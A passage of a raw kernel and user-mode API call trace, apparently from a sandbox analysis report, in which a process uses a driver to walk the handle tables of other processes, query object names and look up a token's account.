Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b94940, HandleInformation=0x0) returned 0x0 [0264.953] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.953] PsReleaseProcessExitSynchronization () returned 0x2 [0264.953] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x38020 [0264.953] ObQueryNameString (in: Object=0xffffe00069b94940, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.953] ObfDereferenceObject (Object=0xffffe00069b94940) returned 0x7fed [0264.953] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.953] PsAcquireProcessExitSynchronization () returned 0x0 [0264.953] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400) [0264.953] ObReferenceObjectByHandle (in: Handle=0x2c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069fccf20, HandleInformation=0x0) returned 0x0 [0264.953] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.953] PsReleaseProcessExitSynchronization () returned 0x2 [0264.953] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x3801f [0264.953] ObQueryNameString (in: Object=0xffffe00069fccf20, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.953] ObfDereferenceObject (Object=0xffffe00069fccf20) returned 0x7ff0 [0264.953] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.953] PsAcquireProcessExitSynchronization () returned 0x0 [0264.953] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400) [0264.953] ObReferenceObjectByHandle (in: Handle=0x3ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069377090, HandleInformation=0x0) returned 0x0 [0264.953] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.953] PsReleaseProcessExitSynchronization () returned 0x2 [0264.953] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x3801e [0264.953] ObQueryNameString (in: Object=0xffffe00069377090, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.953] ObfDereferenceObject (Object=0xffffe00069377090) returned 0x7fed [0264.953] PsLookupProcessByProcessId (in: ProcessId=0x368, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.953] PsAcquireProcessExitSynchronization () returned 0x0 [0264.953] KeStackAttachProcess (in: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069861080, ApcState=0xffffd000b1b8e400) [0264.953] ObReferenceObjectByHandle (in: Handle=0x3b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069da6090, HandleInformation=0x0) returned 0x0 [0264.953] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.953] PsReleaseProcessExitSynchronization () returned 0x2 [0264.953] ObfDereferenceObject (Object=0xffffe00069861080) returned 0x3801d [0264.953] ObQueryNameString (in: Object=0xffffe00069da6090, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.953] ObfDereferenceObject (Object=0xffffe00069da6090) returned 0x7fd2 [0264.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a4) returned 0x180 [0264.954] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0264.954] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00069889080, HandleInformation=0x0) returned 0x0 [0264.954] ObOpenObjectByPointer (in: Object=0xffffe00069889080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.954] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x380f8 [0264.954] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a287b00 | out: TokenHandle=0xffffe0006a287b00*=0x1a8) returned 0x0 [0264.954] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.954] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.954] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="LOCAL SERVICE", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.955] CloseHandle (hObject=0x1a8) returned 1 [0264.955] CloseHandle (hObject=0x180) returned 1 [0264.955] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.955] PsAcquireProcessExitSynchronization () returned 0x0 [0264.955] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.955] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006986f460, HandleInformation=0x0) returned 0x0 [0264.955] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.955] PsReleaseProcessExitSynchronization () returned 0x2 [0264.955] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300f6 [0264.955] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.955] ObfDereferenceObject (Object=0xffffe0006986f460) returned 0x7fff [0264.955] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.955] PsAcquireProcessExitSynchronization () returned 0x0 [0264.955] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.955] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006988b340, HandleInformation=0x0) returned 0x0 [0264.955] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.955] PsReleaseProcessExitSynchronization () returned 0x2 [0264.955] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300f5 [0264.955] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.955] ObfDereferenceObject (Object=0xffffe0006988b340) returned 0x7ffc [0264.955] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.955] PsAcquireProcessExitSynchronization () returned 0x0 [0264.955] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.955] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006988cbf0, HandleInformation=0x0) returned 0x0 [0264.955] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.955] PsReleaseProcessExitSynchronization () returned 0x2 [0264.955] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300f4 [0264.955] ObQueryNameString (in: Object=0xffffe0006988cbf0, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.955] ObfDereferenceObject (Object=0xffffe0006988cbf0) returned 0x7fff [0264.955] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.955] PsAcquireProcessExitSynchronization () returned 0x0 [0264.955] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.955] ObReferenceObjectByHandle (in: Handle=0x12c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698b42d0, HandleInformation=0x0) returned 0x0 [0264.955] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.955] PsReleaseProcessExitSynchronization () returned 0x2 [0264.955] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300f3 [0264.955] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.955] ObfDereferenceObject (Object=0xffffe000698b42d0) returned 0x7fff [0264.956] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.956] PsAcquireProcessExitSynchronization () returned 0x0 [0264.956] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.956] ObReferenceObjectByHandle (in: Handle=0x164, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148472250, HandleInformation=0x0) returned 0x0 [0264.956] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.956] PsReleaseProcessExitSynchronization () returned 0x2 [0264.956] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300f2 [0264.956] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.956] ObfDereferenceObject (Object=0xffffc00148472250) returned 0x18fff0 [0264.956] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.956] PsAcquireProcessExitSynchronization () returned 0x0 [0264.956] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.956] ObReferenceObjectByHandle (in: Handle=0x1c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698e3300, HandleInformation=0x0) returned 0x0 [0264.956] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.956] PsReleaseProcessExitSynchronization () returned 0x2 [0264.956] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300f1 [0264.956] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.956] ObfDereferenceObject (Object=0xffffe000698e3300) returned 0x800c [0264.956] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.956] PsAcquireProcessExitSynchronization () returned 0x0 [0264.956] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.956] ObReferenceObjectByHandle (in: Handle=0x1c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148700870, HandleInformation=0x0) returned 0x0 [0264.956] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.956] PsReleaseProcessExitSynchronization () returned 0x2 [0264.956] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300f0 [0264.956] ObQueryNameString (in: Object=0xffffc00148700870, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.956] ObfDereferenceObject (Object=0xffffc00148700870) returned 0x7fff [0264.956] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.956] PsAcquireProcessExitSynchronization () returned 0x0 [0264.956] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.956] ObReferenceObjectByHandle (in: Handle=0x1fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698e8aa0, HandleInformation=0x0) returned 0x0 [0264.956] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.956] PsReleaseProcessExitSynchronization () returned 0x2 [0264.956] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300ef [0264.956] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.956] ObfDereferenceObject (Object=0xffffe000698e8aa0) returned 0x8000 [0264.956] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.956] PsAcquireProcessExitSynchronization () returned 0x0 [0264.956] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.956] ObReferenceObjectByHandle (in: Handle=0x204, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698e3540, HandleInformation=0x0) returned 0x0 [0264.956] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.956] PsReleaseProcessExitSynchronization () returned 0x2 [0264.956] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300ee [0264.956] ObQueryNameString (in: Object=0xffffe000698e3540, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.956] ObfDereferenceObject (Object=0xffffe000698e3540) returned 0x8000 [0264.957] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.957] PsAcquireProcessExitSynchronization () returned 0x0 [0264.957] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.957] ObReferenceObjectByHandle (in: Handle=0x208, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148738bc0, HandleInformation=0x0) returned 0x0 [0264.957] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.957] PsReleaseProcessExitSynchronization () returned 0x2 [0264.957] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300ed [0264.957] ObQueryNameString (in: Object=0xffffc00148738bc0, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.957] ObfDereferenceObject (Object=0xffffc00148738bc0) returned 0x7fff [0264.957] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.957] PsAcquireProcessExitSynchronization () returned 0x0 [0264.957] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.957] ObReferenceObjectByHandle (in: Handle=0x234, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006990e480, HandleInformation=0x0) returned 0x0 [0264.957] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.957] PsReleaseProcessExitSynchronization () returned 0x2 [0264.957] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300ec [0264.957] ObQueryNameString (in: Object=0xffffe0006990e480, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.957] ObfDereferenceObject (Object=0xffffe0006990e480) returned 0x74bf [0264.957] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.957] PsAcquireProcessExitSynchronization () returned 0x0 [0264.957] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.957] ObReferenceObjectByHandle (in: Handle=0x350, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001489139a0, HandleInformation=0x0) returned 0x0 [0264.957] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.957] PsReleaseProcessExitSynchronization () returned 0x2 [0264.957] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300eb [0264.957] ObQueryNameString (in: Object=0xffffc001489139a0, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.957] ObfDereferenceObject (Object=0xffffc001489139a0) returned 0x7fff [0264.957] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.957] PsAcquireProcessExitSynchronization () returned 0x0 [0264.957] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.957] ObReferenceObjectByHandle (in: Handle=0x358, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a9f090, HandleInformation=0x0) returned 0x0 [0264.957] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.957] PsReleaseProcessExitSynchronization () returned 0x2 [0264.957] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300ea [0264.957] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.957] ObfDereferenceObject (Object=0xffffe00069a9f090) returned 0x7fe3 [0264.957] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.957] PsAcquireProcessExitSynchronization () returned 0x0 [0264.957] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.957] ObReferenceObjectByHandle (in: Handle=0x378, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a06770, HandleInformation=0x0) returned 0x0 [0264.957] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.957] PsReleaseProcessExitSynchronization () returned 0x2 [0264.957] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300e9 [0264.957] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.957] ObfDereferenceObject (Object=0xffffe00069a06770) returned 0x7fe1 [0264.957] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.957] PsAcquireProcessExitSynchronization () returned 0x0 [0264.957] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.958] ObReferenceObjectByHandle (in: Handle=0x37c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001489bc830, HandleInformation=0x0) returned 0x0 [0264.958] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.958] PsReleaseProcessExitSynchronization () returned 0x2 [0264.958] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300e8 [0264.958] ObQueryNameString (in: Object=0xffffc001489bc830, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.958] ObfDereferenceObject (Object=0xffffc001489bc830) returned 0x7fff [0264.958] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.958] PsAcquireProcessExitSynchronization () returned 0x0 [0264.958] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.958] ObReferenceObjectByHandle (in: Handle=0x384, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069aafd10, HandleInformation=0x0) returned 0x0 [0264.958] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.958] PsReleaseProcessExitSynchronization () returned 0x2 [0264.958] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300e7 [0264.958] ObQueryNameString (in: Object=0xffffe00069aafd10, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.958] ObfDereferenceObject (Object=0xffffe00069aafd10) returned 0x7fe8 [0264.958] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.958] PsAcquireProcessExitSynchronization () returned 0x0 [0264.958] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.958] ObReferenceObjectByHandle (in: Handle=0x3b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069b51f20, HandleInformation=0x0) returned 0x0 [0264.958] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.958] PsReleaseProcessExitSynchronization () returned 0x2 [0264.958] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300e6 [0264.958] ObQueryNameString (in: Object=0xffffe00069b51f20, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.958] ObfDereferenceObject (Object=0xffffe00069b51f20) returned 0x7f72 [0264.958] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.958] PsAcquireProcessExitSynchronization () returned 0x0 [0264.958] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.958] ObReferenceObjectByHandle (in: Handle=0x418, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069bbbae0, HandleInformation=0x0) returned 0x0 [0264.958] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.958] PsReleaseProcessExitSynchronization () returned 0x2 [0264.958] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300e5 [0264.958] ObQueryNameString (in: Object=0xffffe00069bbbae0, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.958] ObfDereferenceObject (Object=0xffffe00069bbbae0) returned 0x7fff [0264.958] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.958] PsAcquireProcessExitSynchronization () returned 0x0 [0264.958] KeStackAttachProcess (in: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00069889080, ApcState=0xffffd000b1b8e400) [0264.958] ObReferenceObjectByHandle (in: Handle=0x448, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069bb97a0, HandleInformation=0x0) returned 0x0 [0264.958] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.958] PsReleaseProcessExitSynchronization () returned 0x2 [0264.958] ObfDereferenceObject (Object=0xffffe00069889080) returned 0x300e4 [0264.958] ObQueryNameString (in: Object=0xffffe00069bb97a0, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.958] ObfDereferenceObject (Object=0xffffe00069bb97a0) returned 0x7fff [0264.958] PsLookupProcessByProcessId (in: ProcessId=0x3a4, 